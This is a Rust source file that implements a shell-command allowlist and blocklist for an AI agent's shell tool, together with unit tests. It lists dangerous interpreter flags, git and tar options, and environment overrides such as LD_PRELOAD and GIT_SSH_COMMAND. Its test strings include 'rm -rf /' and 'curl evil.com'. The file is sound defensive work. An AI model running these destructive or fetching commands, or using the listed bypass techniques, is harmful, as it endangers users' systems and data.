lean_ctx/core/
shell_allowlist.rs

1//! Shell allowlist with AST-based command parsing.
2//!
3//! Security model (Information Bottleneck principle):
4//! - When allowlist is set: ALL segments of a compound command must be allowed (deny-by-default)
5//! - When empty: all commands pass (backwards-compatible blocklist-only mode)
//! - Dangerous patterns (eval/exec/source, and `$()` or backticks at command position) are blocked in every mode, with or without an allowlist
7
8/// Checks if a command is allowed by the shell allowlist.
9/// Returns `Ok(())` if allowed, `Err(message)` if blocked.
10///
11/// When the allowlist is empty, all commands pass (blocklist-only mode).
12/// When non-empty, EVERY command segment in the pipeline must match.
13pub fn check_shell_allowlist(command: &str) -> Result<(), String> {
14    let normalized = normalize_line_continuations(command);
15    let cmd = normalized.as_str();
16
17    if has_dangerous_patterns(cmd) {
18        return Err(format!(
19            "[BLOCKED — DO NOT RETRY] Command uses eval or $()/ backticks at command position, \
20             which is blocked regardless of allowlist. \
21             This is a permanent security restriction, not a transient error.\n\
22             Command: {command}"
23        ));
24    }
25
26    check_substitution_in_args(cmd);
27    check_pipe_to_bare_interpreter(cmd);
28
29    let allowlist = effective_allowlist();
30    if allowlist.is_empty() {
31        check_unconditional_blocked_only(cmd)?;
32        return Ok(());
33    }
34    check_all_segments(cmd, &allowlist)
35}
36
37/// Normalize the command string: remove backslash-newline continuations and
38/// replace Unicode line separators (U+2028, U+2029) with newlines.
39fn normalize_line_continuations(command: &str) -> String {
40    command
41        .replace("\\\r\n", "")
42        .replace("\\\n", "")
43        .replace(['\u{2028}', '\u{2029}'], "\n")
44}
45
46/// WARN-FIRST: Log warning (or block if strict) for $(), backticks, <() in arguments.
47fn check_substitution_in_args(command: &str) {
48    let strict = crate::core::config::Config::load().shell_strict_mode;
49    if has_unquoted_substitution_in_args(command) {
50        if strict {
51            tracing::warn!(
52                "[SECURITY] Command substitution in arguments blocked (shell_strict_mode=true): {command}"
53            );
54        } else {
55            tracing::warn!(
56                "[SECURITY] Command substitution in arguments detected (warn-only, set shell_strict_mode=true to block): {command}"
57            );
58        }
59    }
60}
61
62/// Check for $(), backticks, <(, >( outside of command position, outside quotes.
63fn has_unquoted_substitution_in_args(command: &str) -> bool {
64    let bytes = command.as_bytes();
65    let len = bytes.len();
66    let mut i = 0;
67    let mut in_single_quote = false;
68    let mut in_double_quote = false;
69    let mut past_first_token = false;
70    let mut seen_space_after_cmd = false;
71
72    while i < len {
73        let ch = bytes[i];
74        if in_single_quote {
75            if ch == b'\'' {
76                in_single_quote = false;
77            }
78            i += 1;
79            continue;
80        }
81        if in_double_quote {
82            if ch == b'"' && (i == 0 || bytes[i - 1] != b'\\') {
83                in_double_quote = false;
84            }
85            i += 1;
86            continue;
87        }
88        match ch {
89            b'\'' => {
90                in_single_quote = true;
91                i += 1;
92            }
93            b'"' => {
94                in_double_quote = true;
95                i += 1;
96            }
97            b' ' | b'\t' if !past_first_token => {
98                seen_space_after_cmd = true;
99                i += 1;
100            }
101            _ if !seen_space_after_cmd => {
102                i += 1;
103            }
104            _ => {
105                past_first_token = true;
106                if ch == b'$' && i + 1 < len && bytes[i + 1] == b'(' {
107                    return true;
108                }
109                if ch == b'`' {
110                    return true;
111                }
112                if (ch == b'<' || ch == b'>') && i + 1 < len && bytes[i + 1] == b'(' {
113                    return true;
114                }
115                i += 1;
116            }
117        }
118    }
119    false
120}
121
122/// WARN-FIRST: Log warning for piping into bare interpreter (no script file).
123fn check_pipe_to_bare_interpreter(command: &str) {
124    let segments = split_on_operators(command);
125    let pipe_indices: Vec<usize> = {
126        let mut indices = Vec::new();
127        let bytes = command.as_bytes();
128        let len = bytes.len();
129        let mut j = 0;
130        let mut in_sq = false;
131        let mut in_dq = false;
132        while j < len {
133            if in_sq {
134                if bytes[j] == b'\'' {
135                    in_sq = false;
136                }
137                j += 1;
138                continue;
139            }
140            if in_dq {
141                if bytes[j] == b'"' && (j == 0 || bytes[j - 1] != b'\\') {
142                    in_dq = false;
143                }
144                j += 1;
145                continue;
146            }
147            match bytes[j] {
148                b'\'' => {
149                    in_sq = true;
150                    j += 1;
151                }
152                b'"' => {
153                    in_dq = true;
154                    j += 1;
155                }
156                b'|' if j + 1 < len && bytes[j + 1] != b'|' => {
157                    indices.push(j);
158                    j += 1;
159                }
160                _ => {
161                    j += 1;
162                }
163            }
164        }
165        indices
166    };
167    let _ = pipe_indices;
168
169    for (idx, seg) in segments.iter().enumerate() {
170        if idx == 0 {
171            continue;
172        }
173        if is_bare_interpreter_stdin(seg) {
174            let base = extract_base_from_segment(seg);
175            let strict = crate::core::config::Config::load().shell_strict_mode;
176            if strict {
177                tracing::warn!(
178                    "[SECURITY] Pipe to bare interpreter '{base}' blocked (shell_strict_mode=true)"
179                );
180            } else {
181                tracing::warn!("[SECURITY] Pipe to bare interpreter '{base}' detected (warn-only)");
182            }
183        }
184    }
185}
186
187/// For empty allowlists: still enforce UNCONDITIONAL_BLOCKED commands.
188fn check_unconditional_blocked_only(command: &str) -> Result<(), String> {
189    let segments = extract_all_commands(command);
190    for seg in &segments {
191        let base = extract_base_from_segment(seg);
192        if !base.is_empty() && UNCONDITIONAL_BLOCKED.contains(&base.as_str()) {
193            return Err(format!(
194                "[BLOCKED — DO NOT RETRY] '{base}' is unconditionally blocked \
195                 regardless of allowlist configuration.\n\
196                 Command: {command}"
197            ));
198        }
199        check_inline_env_block(seg)?;
200        check_interpreter_eval_only(seg)?;
201        check_dangerous_flags(seg)?;
202    }
203    Ok(())
204}
205
206/// Like `check_interpreter_abuse` but only checks for eval flags on interpreters.
207/// Skips delegation-command checks (which require an allowlist for membership test).
208/// Used in blocklist-only mode where there is no allowlist.
209fn check_interpreter_eval_only(segment: &str) -> Result<(), String> {
210    let trimmed = skip_env_assignments(segment.trim());
211    let tokens: Vec<&str> = trimmed.split_whitespace().collect();
212    if tokens.is_empty() {
213        return Ok(());
214    }
215    let base = tokens[0].rsplit('/').next().unwrap_or(tokens[0]);
216    if !INTERPRETER_COMMANDS.contains(&base) {
217        return Ok(());
218    }
219    for &tok in &tokens[1..] {
220        if EVAL_FLAGS.contains(&tok) {
221            return Err(format!(
222                "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with inline code execution \
223                 flag '{tok}' is blocked. Use a script file instead.\n\
224                 This is a permanent security restriction."
225            ));
226        }
227        if has_eval_flag_prefix(tok) {
228            return Err(format!(
229                "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with combined flag '{tok}' \
230                 containing eval flag is blocked.\n\
231                 This is a permanent security restriction."
232            ));
233        }
234    }
235    if tokens[1..].iter().any(|t| t.contains("<<")) {
236        return Err(format!(
237            "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with heredoc stdin is blocked. \
238             Use a script file instead.\n\
239             This is a permanent security restriction."
240        ));
241    }
242    Ok(())
243}
244
/// Command names rejected in every mode, even when they appear in the
/// allowlist: they execute arbitrary code directly or re-enter the shell.
const UNCONDITIONAL_BLOCKED: &[&str] = &[
    "eval",
    "exec",
    "source",
    ".",
];

/// Interpreter executables whose arguments are screened for inline-code flags.
const INTERPRETER_COMMANDS: &[&str] = &[
    "python",
    "python3",
    "python2",
    "node",
    "ruby",
    "perl",
    "lua",
    "php",
    "bash",
    "sh",
    "zsh",
    "fish",
    "dash",
    "ksh",
];

/// Exact interpreter flags that are treated as inline code execution.
const EVAL_FLAGS: &[&str] = &[
    "-c",
    "-e",
    "-r",
    "-p",
    "--eval",
    "--exec",
    "-exec",
    "--print",
    "--run",
];

/// File suffixes that mark an interpreter argument as a script file
/// (as opposed to the interpreter reading code from stdin).
const SCRIPT_EXTENSIONS: &[&str] = &[
    ".py",
    ".rb",
    ".js",
    ".ts",
    ".pl",
    ".lua",
    ".php",
    ".sh",
    ".bash",
    ".zsh",
    ".mjs",
    ".cjs",
    ".tsx",
    ".jsx",
];

/// Wrapper commands that run another command; the wrapped command must be
/// allowed as well.
const DELEGATION_COMMANDS: &[&str] = &[
    "env",
    "nice",
    "timeout",
    "sudo",
    "doas",
];
268
269/// Check if a segment uses an interpreter with an eval flag, or a delegation command
270/// whose target is not in the allowlist.
271fn check_interpreter_abuse(segment: &str, allowlist: &[String]) -> Result<(), String> {
272    check_interpreter_abuse_inner(segment, allowlist, 0)
273}
274
275fn check_interpreter_abuse_inner(
276    segment: &str,
277    allowlist: &[String],
278    depth: usize,
279) -> Result<(), String> {
280    if depth > 3 {
281        return Ok(());
282    }
283    let trimmed = skip_env_assignments(segment.trim());
284    let tokens: Vec<&str> = trimmed.split_whitespace().collect();
285    if tokens.is_empty() {
286        return Ok(());
287    }
288
289    let base = tokens[0].rsplit('/').next().unwrap_or(tokens[0]);
290
291    if INTERPRETER_COMMANDS.contains(&base) {
292        for &tok in &tokens[1..] {
293            if EVAL_FLAGS.contains(&tok) {
294                return Err(format!(
295                    "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with inline code execution \
296                     flag '{tok}' is blocked. Use a script file instead.\n\
297                     This is a permanent security restriction."
298                ));
299            }
300            if has_eval_flag_prefix(tok) {
301                return Err(format!(
302                    "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with combined flag '{tok}' \
303                     containing eval flag is blocked.\n\
304                     This is a permanent security restriction."
305                ));
306            }
307        }
308        if tokens[1..].iter().any(|t| t.contains("<<")) {
309            return Err(format!(
310                "[BLOCKED — DO NOT RETRY] Interpreter '{base}' with heredoc stdin is blocked. \
311                 Use a script file instead.\n\
312                 This is a permanent security restriction."
313            ));
314        }
315    }
316
317    if DELEGATION_COMMANDS.contains(&base) {
318        let rest_tokens: Vec<&str> = tokens[1..]
319            .iter()
320            .skip_while(|t| t.starts_with('-') || t.contains('='))
321            .copied()
322            .collect();
323        if let Some(&delegated_tok) = rest_tokens.first() {
324            let delegated = delegated_tok.rsplit('/').next().unwrap_or(delegated_tok);
325            if !delegated.is_empty() && !allowlist.iter().any(|a| a == delegated) {
326                return Err(format!(
327                    "[BLOCKED — DO NOT RETRY] '{base}' delegates to '{delegated}' which is not \
328                     in the shell allowlist. This is a permanent restriction."
329                ));
330            }
331            let rest_str = rest_tokens.join(" ");
332            check_interpreter_abuse_inner(&rest_str, allowlist, depth + 1)?;
333        }
334    }
335
336    Ok(())
337}
338
/// Reports whether `token` is a single-dash flag cluster of at least two
/// characters (e.g. `-pe`, `-ne`, `-ce`) containing one of the eval letters
/// `c`, `e`, `r` or `p`. Double-dash options and two-byte flags such as `-c`
/// are never matched here.
fn has_eval_flag_prefix(token: &str) -> bool {
    const EVAL_LETTERS: &str = "cerp";
    match token.strip_prefix('-') {
        Some(cluster) if cluster.len() >= 2 && !cluster.starts_with('-') => {
            cluster.chars().any(|letter| EVAL_LETTERS.contains(letter))
        }
        _ => false,
    }
}
348
349/// Check if a segment is a bare interpreter after a pipe (no script file argument).
350fn is_bare_interpreter_stdin(segment: &str) -> bool {
351    let trimmed = skip_env_assignments(segment.trim());
352    let tokens: Vec<&str> = trimmed.split_whitespace().collect();
353    if tokens.is_empty() {
354        return false;
355    }
356    let base = tokens[0].rsplit('/').next().unwrap_or(tokens[0]);
357    if !INTERPRETER_COMMANDS.contains(&base) {
358        return false;
359    }
360    !tokens[1..]
361        .iter()
362        .any(|t| !t.starts_with('-') && SCRIPT_EXTENSIONS.iter().any(|ext| t.ends_with(ext)))
363}
364
/// `git` option prefixes that let the caller choose a program for git to run.
const DANGEROUS_GIT_FLAGS: &[&str] = &[
    "--upload-pack",
    "--receive-pack",
    "--config=core.sshcommand",
    "--config=core.gitproxy",
];

/// `tar` option prefixes that hand archive data to an external program.
const DANGEROUS_TAR_FLAGS: &[&str] = &[
    "--to-command",
    "--use-compress-program",
];

/// Inline `KEY=` environment overrides that are rejected because they can
/// redirect which program ends up being executed.
const BLOCKED_INLINE_ENV: &[&str] = &[
    "PATH=",
    "GIT_ASKPASS=",
    "GIT_SSH=",
    "GIT_SSH_COMMAND=",
    "GIT_EDITOR=",
    "GIT_EXTERNAL_DIFF=",
    "SSH_ASKPASS=",
    "LD_PRELOAD=",
    "DYLD_INSERT_LIBRARIES=",
];
387
388fn check_dangerous_flags(segment: &str) -> Result<(), String> {
389    let trimmed = skip_env_assignments(segment.trim());
390    let tokens: Vec<&str> = trimmed.split_whitespace().collect();
391    if tokens.is_empty() {
392        return Ok(());
393    }
394    let base = tokens[0].rsplit('/').next().unwrap_or(tokens[0]);
395
396    match base {
397        "git" => {
398            for &tok in &tokens[1..] {
399                for flag in DANGEROUS_GIT_FLAGS {
400                    if tok.starts_with(flag) {
401                        return Err(format!(
402                            "[BLOCKED — DO NOT RETRY] 'git' with dangerous flag '{tok}' is blocked.\n\
403                             This is a permanent security restriction."
404                        ));
405                    }
406                }
407            }
408        }
409        "tar" => {
410            for &tok in &tokens[1..] {
411                for flag in DANGEROUS_TAR_FLAGS {
412                    if tok.starts_with(flag) {
413                        return Err(format!(
414                            "[BLOCKED — DO NOT RETRY] 'tar' with dangerous flag '{tok}' is blocked.\n\
415                             This is a permanent security restriction."
416                        ));
417                    }
418                }
419            }
420        }
421        "find" => {
422            for &tok in &tokens[1..] {
423                if tok == "-exec" || tok == "-execdir" {
424                    return Err(format!(
425                        "[BLOCKED — DO NOT RETRY] 'find' with '{tok}' is blocked. \
426                         Use 'find ... -print' and pipe to xargs instead.\n\
427                         This is a permanent security restriction."
428                    ));
429                }
430            }
431        }
432        "awk" | "gawk" | "mawk" => {
433            for &tok in &tokens[1..] {
434                if tok.contains("system(") {
435                    return Err(format!(
436                        "[BLOCKED — DO NOT RETRY] '{base}' with 'system()' call is blocked.\n\
437                         This is a permanent security restriction."
438                    ));
439                }
440            }
441        }
442        _ => {}
443    }
444    Ok(())
445}
446
447fn check_inline_env_block(segment: &str) -> Result<(), String> {
448    let trimmed = segment.trim();
449    for blocked in BLOCKED_INLINE_ENV {
450        if trimmed.starts_with(blocked) {
451            return Err(format!(
452                "[BLOCKED — DO NOT RETRY] Inline environment override '{blocked}' is blocked.\n\
453                 This is a permanent security restriction."
454            ));
455        }
456    }
457    Ok(())
458}
459
460fn check_all_segments(command: &str, allowlist: &[String]) -> Result<(), String> {
461    if allowlist.is_empty() {
462        return Ok(());
463    }
464
465    if has_dangerous_patterns(command) {
466        return Err(format!(
467            "[BLOCKED — DO NOT RETRY] Command uses eval or $()/ backticks at command position, \
468             which is blocked in restricted mode. \
469             This is a permanent security restriction, not a transient error.\n\
470             Command: {command}"
471        ));
472    }
473
474    let segments = extract_all_commands(command);
475    if segments.is_empty() {
476        return Err("[BLOCKED — DO NOT RETRY] Empty command".to_string());
477    }
478
479    for seg in &segments {
480        check_inline_env_block(seg)?;
481        let base = extract_base_from_segment(seg);
482        if base.is_empty() {
483            continue;
484        }
485        if UNCONDITIONAL_BLOCKED.contains(&base.as_str()) {
486            return Err(format!(
487                "[BLOCKED — DO NOT RETRY] '{base}' is unconditionally blocked \
488                 regardless of allowlist membership. \
489                 This is a permanent security restriction.\n\
490                 Command: {command}"
491            ));
492        }
493        check_interpreter_abuse(seg, allowlist)?;
494        check_dangerous_flags(seg)?;
495        if !allowlist.iter().any(|a| a == &base) {
496            return Err(format!(
497                "[BLOCKED — DO NOT RETRY] '{base}' is not in the shell allowlist. \
498                 This is a permanent restriction, not a transient error.\n\
499                 Fix: add '{base}' to shell_allowlist in ~/.lean-ctx/config.toml\n\
500                 Or disable the allowlist: shell_allowlist = []\n\
501                 Do NOT retry this command — it will fail again with the same error."
502            ));
503        }
504    }
505    Ok(())
506}
507
508/// Detect dangerous shell patterns that bypass allowlist intent.
509///
510/// Only blocks patterns that are genuinely dangerous at command position.
511/// `$()` and backticks in *arguments* are allowed — the base command is
512/// already validated by the allowlist, and blocking substitutions in
513/// arguments breaks legitimate workflows (e.g. `git commit -m "$(cat ...)"`,
514/// pre-commit hooks, playwright scripts).
515fn has_dangerous_patterns(command: &str) -> bool {
516    let trimmed = command.trim();
517
518    for blocked in UNCONDITIONAL_BLOCKED {
519        let with_space = format!("{blocked} ");
520        if trimmed.starts_with(&with_space) {
521            return true;
522        }
523        for sep in ["; ", "&& ", "|| ", "| ", "\n"] {
524            if trimmed.contains(&format!("{sep}{blocked} ")) {
525                return true;
526            }
527        }
528    }
529
530    if has_substitution_at_command_pos(trimmed) {
531        return true;
532    }
533
534    false
535}
536
537/// Check if `$()` or backticks appear at command position (first token
538/// of any segment). Substitutions in *arguments* are intentionally
539/// allowed — the security boundary is the base-command allowlist check.
540fn has_substitution_at_command_pos(command: &str) -> bool {
541    let segments = split_on_operators(command);
542    for seg in segments {
543        let trimmed = seg.trim();
544        let cmd_start = skip_env_assignments(trimmed);
545
546        if cmd_start.starts_with("$(") {
547            return true;
548        }
549
550        let first_token = cmd_start.split_whitespace().next().unwrap_or("");
551        if first_token.starts_with('`') || first_token == "`" {
552            return true;
553        }
554    }
555    false
556}
557
558/// Extract ALL command segments from a compound shell command.
559/// Splits on: &&, ||, ;, | (pipe), and handles subshell grouping.
560fn extract_all_commands(command: &str) -> Vec<String> {
561    split_on_operators(command)
562        .into_iter()
563        .map(|s| s.trim().to_string())
564        .filter(|s| !s.is_empty())
565        .collect()
566}
567
/// True when the `&` at index `amp` belongs to a file-descriptor duplication
/// such as `2>&1`, `>&2` or `<&-` rather than being a command separator.
///
/// Deliberately narrow so that a real separator is never hidden: the `&` must
/// directly follow `<` or `>`, that redirect must not itself follow an escape
/// character (`\`, `^` or a backtick), and the byte after the `&` must be a
/// digit or `-`.
fn is_fd_duplication(bytes: &[u8], amp: usize) -> bool {
    let after_redirect = amp >= 1 && matches!(bytes[amp - 1], b'<' | b'>');
    let redirect_unescaped = amp < 2 || !matches!(bytes[amp - 2], b'\\' | b'^' | b'`');
    let has_fd_target = matches!(bytes.get(amp + 1), Some(b) if b.is_ascii_digit() || *b == b'-');
    after_redirect && redirect_unescaped && has_fd_target
}

/// Split a command string on shell separators: `;`, `&&`, `||`, `|`, a single
/// `&`, and line breaks (`\n`, `\r`).
///
/// Separators inside single quotes, double quotes or parentheses do not
/// split. The returned slices borrow from `command` and exclude the
/// separators; empty segments between adjacent separators are kept, and a
/// trailing empty segment is omitted.
///
/// Details that matter for the allowlist:
/// * `2>&1`-style fd duplications are not separators (see `is_fd_duplication`).
///   `&>` is still split, because POSIX shells parse it as `&` followed by `>`.
/// * A backslash-escaped `(` does not open a group, so `echo \( ; rm` still
///   splits at the `;`.
/// * Inside double quotes a backslash escapes the next byte, so `"a\\"` closes
///   the quote.
///
/// NOTE(review): outside quotes, a backslash-escaped quote character (`\'`,
/// `\"`) is still treated as opening a quoted span.
fn split_on_operators(command: &str) -> Vec<&str> {
    let bytes = command.as_bytes();
    let len = bytes.len();
    let mut segments = Vec::new();
    let mut start = 0;
    let mut i = 0;
    let mut in_single_quote = false;
    let mut in_double_quote = false;
    let mut paren_depth: u32 = 0;

    while i < len {
        let ch = bytes[i];

        if in_single_quote {
            if ch == b'\'' {
                in_single_quote = false;
            }
            i += 1;
            continue;
        }

        if in_double_quote {
            match ch {
                // Skip the escaped byte: `\"` stays inside, `\\"` closes.
                b'\\' => i += 2,
                b'"' => {
                    in_double_quote = false;
                    i += 1;
                }
                _ => i += 1,
            }
            continue;
        }

        match ch {
            b'\'' => {
                in_single_quote = true;
                i += 1;
            }
            b'"' => {
                in_double_quote = true;
                i += 1;
            }
            // Literal paren: must not raise the depth and mask later separators.
            b'\\' if i + 1 < len && bytes[i + 1] == b'(' => {
                i += 2;
            }
            b'(' => {
                paren_depth += 1;
                i += 1;
            }
            b')' => {
                paren_depth = paren_depth.saturating_sub(1);
                i += 1;
            }
            b'\n' | b'\r' | b';' if paren_depth == 0 => {
                segments.push(&command[start..i]);
                i += 1;
                start = i;
            }
            b'&' if paren_depth == 0 && is_fd_duplication(bytes, i) => {
                i += 1;
            }
            b'&' | b'|' if paren_depth == 0 => {
                // A doubled operator (`&&`, `||`) is two bytes wide; a single
                // `&` (background) or `|` (pipe) is one. All four separate
                // commands.
                let width = if bytes.get(i + 1) == Some(&ch) { 2 } else { 1 };
                segments.push(&command[start..i]);
                i += width;
                start = i;
            }
            _ => {
                i += 1;
            }
        }
    }

    if start < len {
        segments.push(&command[start..]);
    }

    segments
}
659
660/// Extract the base command name from a single segment (no operators).
661fn extract_base_from_segment(segment: &str) -> String {
662    let trimmed = segment.trim();
663    if trimmed.is_empty() {
664        return String::new();
665    }
666
667    let cmd_part = skip_env_assignments(trimmed);
668    if cmd_part.is_empty() {
669        return String::new();
670    }
671
672    // Take first whitespace-delimited token as the command
673    let first_token = cmd_part.split_whitespace().next().unwrap_or("");
674
675    // Strip path prefix: /usr/bin/git -> git
676    first_token
677        .rsplit('/')
678        .next()
679        .unwrap_or(first_token)
680        .to_string()
681}
682
/// Byte length of the first shell word of `text` (no leading whitespace).
///
/// Whitespace inside single quotes, inside double quotes, or right after a
/// backslash does not end the word. If a quote is never closed, the plain
/// whitespace-delimited length is returned so the text after it is still
/// examined.
fn first_shell_word_len(text: &str) -> usize {
    let plain_len = text.find(char::is_whitespace).unwrap_or(text.len());
    let mut chars = text.char_indices();
    while let Some((idx, ch)) = chars.next() {
        match ch {
            '\\' => {
                // Escaped character: part of the word whatever it is.
                chars.next();
            }
            '\'' => {
                if !chars.by_ref().any(|(_, c)| c == '\'') {
                    return plain_len;
                }
            }
            '"' => {
                let mut closed = false;
                while let Some((_, c)) = chars.next() {
                    match c {
                        '\\' => {
                            chars.next();
                        }
                        '"' => {
                            closed = true;
                            break;
                        }
                        _ => {}
                    }
                }
                if !closed {
                    return plain_len;
                }
            }
            c if c.is_whitespace() => return idx,
            _ => {}
        }
    }
    text.len()
}

/// True when `word` looks like a `KEY=VALUE` assignment: it contains `=`, does
/// not start with `-`, `/` or `.`, and has no quote or backslash before the
/// first `=`.
fn is_env_assignment_word(word: &str) -> bool {
    match word.find('=') {
        Some(eq) => {
            !word.starts_with(['-', '/', '.']) && !word[..eq].contains(['\'', '"', '\\'])
        }
        None => false,
    }
}

/// Skip leading KEY=VALUE environment variable assignments.
///
/// Returns the remainder of `segment` starting at the first word that is not
/// an assignment. Quoted values are skipped as a whole, so
/// `A="x git " rm -rf /` yields `rm -rf /` rather than `git " rm -rf /`.
/// When the very first word is not an assignment, `segment` is returned
/// unchanged, including any leading whitespace.
fn skip_env_assignments(segment: &str) -> &str {
    let mut rest = segment;
    loop {
        let candidate = rest.trim_start();
        if candidate.is_empty() {
            return rest;
        }
        let word = &candidate[..first_shell_word_len(candidate)];
        if !is_env_assignment_word(word) {
            return rest;
        }
        rest = candidate[word.len()..].trim_start();
    }
}
705
706fn effective_allowlist() -> Vec<String> {
707    // LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE completely replaces the config (for testing)
708    if let Ok(ov) = std::env::var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE") {
709        return ov
710            .split(',')
711            .map(|s| s.trim().to_string())
712            .filter(|s| !s.is_empty())
713            .collect();
714    }
715    let mut list = crate::core::config::Config::load().shell_allowlist;
716    if let Ok(env_val) = std::env::var("LEAN_CTX_SHELL_ALLOWLIST") {
717        for entry in env_val
718            .split(',')
719            .map(|s| s.trim().to_string())
720            .filter(|s| !s.is_empty())
721        {
722            if !list.contains(&entry) {
723                list.push(entry);
724            }
725        }
726    }
727    list
728}
729
730/// Public accessor for extracting all command segments.
731pub fn extract_all_commands_pub(command: &str) -> Vec<String> {
732    extract_all_commands(command)
733}
734
735// Legacy compat: single-segment extraction (used by other callers)
736pub fn extract_base_command(command: &str) -> String {
737    let first_seg = split_on_operators(command)
738        .into_iter()
739        .next()
740        .unwrap_or(command);
741    extract_base_from_segment(first_seg)
742}
743
744#[cfg(test)]
745mod tests {
746    use super::*;
747
748    // --- extract_base_command tests (legacy compat) ---
749
750    #[test]
751    fn extract_simple_command() {
752        assert_eq!(extract_base_command("git status"), "git");
753    }
754
755    #[test]
756    fn extract_with_path() {
757        assert_eq!(extract_base_command("/usr/bin/git log"), "git");
758    }
759
760    #[test]
761    fn extract_with_env_assignment() {
762        assert_eq!(extract_base_command("LANG=en_US git log"), "git");
763    }
764
765    #[test]
766    fn extract_chained_commands() {
767        assert_eq!(extract_base_command("cd /tmp && ls -la"), "cd");
768    }
769
770    #[test]
771    fn extract_piped_command() {
772        assert_eq!(extract_base_command("grep foo | wc -l"), "grep");
773    }
774
775    #[test]
776    fn extract_semicolon_chain() {
777        assert_eq!(extract_base_command("echo hello; rm -rf /"), "echo");
778    }
779
780    #[test]
781    fn extract_empty_command() {
782        assert_eq!(extract_base_command(""), "");
783    }
784
785    #[test]
786    fn extract_whitespace_only() {
787        assert_eq!(extract_base_command("   "), "");
788    }
789
790    #[test]
791    fn extract_multiple_env_vars() {
792        assert_eq!(extract_base_command("FOO=bar BAZ=qux cargo test"), "cargo");
793    }
794
795    // --- All-segments validation tests ---
796
797    fn allow(cmds: &[&str]) -> Vec<String> {
798        cmds.iter().map(std::string::ToString::to_string).collect()
799    }
800
801    #[test]
802    fn allowlist_empty_always_passes() {
803        assert!(check_all_segments("anything", &[]).is_ok());
804    }
805
806    #[test]
807    fn allowlist_blocks_unlisted() {
808        let list = allow(&["git", "cargo"]);
809        let result = check_all_segments("npm install", &list);
810        assert!(result.is_err());
811        assert!(result.unwrap_err().contains("npm"));
812    }
813
814    #[test]
815    fn allowlist_allows_listed() {
816        let list = allow(&["git", "cargo", "npm"]);
817        assert!(check_all_segments("git status", &list).is_ok());
818        assert!(check_all_segments("cargo test --release", &list).is_ok());
819        assert!(check_all_segments("npm run build", &list).is_ok());
820    }
821
822    #[test]
823    fn allowlist_allows_full_path() {
824        let list = allow(&["git"]);
825        assert!(check_all_segments("/usr/bin/git status", &list).is_ok());
826    }
827
828    #[test]
829    fn allowlist_allows_with_env_prefix() {
830        let list = allow(&["git"]);
831        assert!(check_all_segments("LANG=C git log", &list).is_ok());
832    }
833
834    #[test]
835    fn allowlist_blocks_similar_names() {
836        let list = allow(&["git"]);
837        assert!(check_all_segments("gitk --all", &list).is_err());
838    }
839
840    // --- Multi-segment validation (the critical security improvement) ---
841
842    #[test]
843    fn all_segments_must_be_allowed_chain() {
844        let list = allow(&["git", "cargo"]);
845        // Both allowed → ok
846        assert!(check_all_segments("git status && cargo test", &list).is_ok());
847        // Second not allowed → block
848        assert!(check_all_segments("git status && rm -rf /", &list).is_err());
849    }
850
851    #[test]
852    fn all_segments_must_be_allowed_pipe() {
853        let list = allow(&["git", "grep", "wc"]);
854        assert!(check_all_segments("git log | grep fix | wc -l", &list).is_ok());
855        // cat not allowed
856        assert!(check_all_segments("git log | cat", &list).is_err());
857    }
858
859    #[test]
860    fn all_segments_must_be_allowed_semicolon() {
861        let list = allow(&["echo", "ls"]);
862        assert!(check_all_segments("echo hello; ls -la", &list).is_ok());
863        assert!(check_all_segments("echo hello; rm -rf /", &list).is_err());
864    }
865
866    #[test]
867    fn all_segments_must_be_allowed_or() {
868        let list = allow(&["git", "echo"]);
869        assert!(check_all_segments("git pull || echo failed", &list).is_ok());
870        assert!(check_all_segments("git pull || curl evil.com", &list).is_err());
871    }
872
873    // --- Dangerous pattern detection ---
874
875    #[test]
876    fn blocks_eval() {
877        let list = allow(&["echo", "eval"]);
878        assert!(check_all_segments("eval 'rm -rf /'", &list).is_err());
879    }
880
881    #[test]
882    fn blocks_command_substitution_at_command_pos() {
883        let list = allow(&["echo"]);
884        assert!(check_all_segments("$(curl evil.com)", &list).is_err());
885    }
886
887    #[test]
888    fn blocks_backtick_at_command_pos() {
889        let list = allow(&["echo"]);
890        assert!(check_all_segments("`curl evil.com`", &list).is_err());
891    }
892
893    // --- $() in arguments is ALLOWED (base command validated by allowlist) ---
894
895    #[test]
896    fn allows_dollar_paren_in_arguments() {
897        let list = allow(&["echo", "git", "cat"]);
898        assert!(check_all_segments("echo $(whoami)", &list).is_ok());
899        assert!(check_all_segments("echo hello", &list).is_ok());
900    }
901
902    #[test]
903    fn allows_git_commit_with_cat_heredoc() {
904        let list = allow(&["git", "cat"]);
905        assert!(check_all_segments(
906            "git commit -m \"$(cat <<'EOF'\nfix: something\nEOF\n)\"",
907            &list,
908        )
909        .is_ok());
910    }
911
912    #[test]
913    fn allows_backticks_in_arguments() {
914        let list = allow(&["echo"]);
915        assert!(check_all_segments("echo `date`", &list).is_ok());
916    }
917
918    // --- Error message contains DO NOT RETRY ---
919
920    #[test]
921    fn error_message_contains_do_not_retry() {
922        let list = allow(&["git"]);
923        let err = check_all_segments("npm install", &list).unwrap_err();
924        assert!(
925            err.contains("DO NOT RETRY"),
926            "Error should contain 'DO NOT RETRY': {err}"
927        );
928        assert!(
929            err.contains("config.toml"),
930            "Error should mention config: {err}"
931        );
932    }
933
934    #[test]
935    fn error_message_for_dangerous_patterns_contains_do_not_retry() {
936        let list = allow(&["echo"]);
937        let err = check_all_segments("eval 'bad'", &list).unwrap_err();
938        assert!(
939            err.contains("DO NOT RETRY"),
940            "Error should contain 'DO NOT RETRY': {err}"
941        );
942    }
943
944    // --- Issue #294: pre-commit and playwright should work ---
945
946    #[test]
947    fn pre_commit_in_default_allowlist() {
948        let defaults = crate::core::config::default_shell_allowlist();
949        assert!(
950            defaults.contains(&"pre-commit".to_string()),
951            "pre-commit must be in default allowlist"
952        );
953    }
954
955    #[test]
956    fn playwright_in_default_allowlist() {
957        let defaults = crate::core::config::default_shell_allowlist();
958        assert!(
959            defaults.contains(&"playwright".to_string()),
960            "playwright must be in default allowlist"
961        );
962    }
963
964    #[test]
965    fn pre_commit_run_allowed() {
966        let list = allow(&["pre-commit"]);
967        assert!(check_all_segments("pre-commit run --all-files", &list).is_ok());
968    }
969
970    #[test]
971    fn playwright_test_allowed() {
972        let list = allow(&["npx", "playwright"]);
973        assert!(check_all_segments("playwright test", &list).is_ok());
974        assert!(check_all_segments("npx playwright test", &list).is_ok());
975    }
976
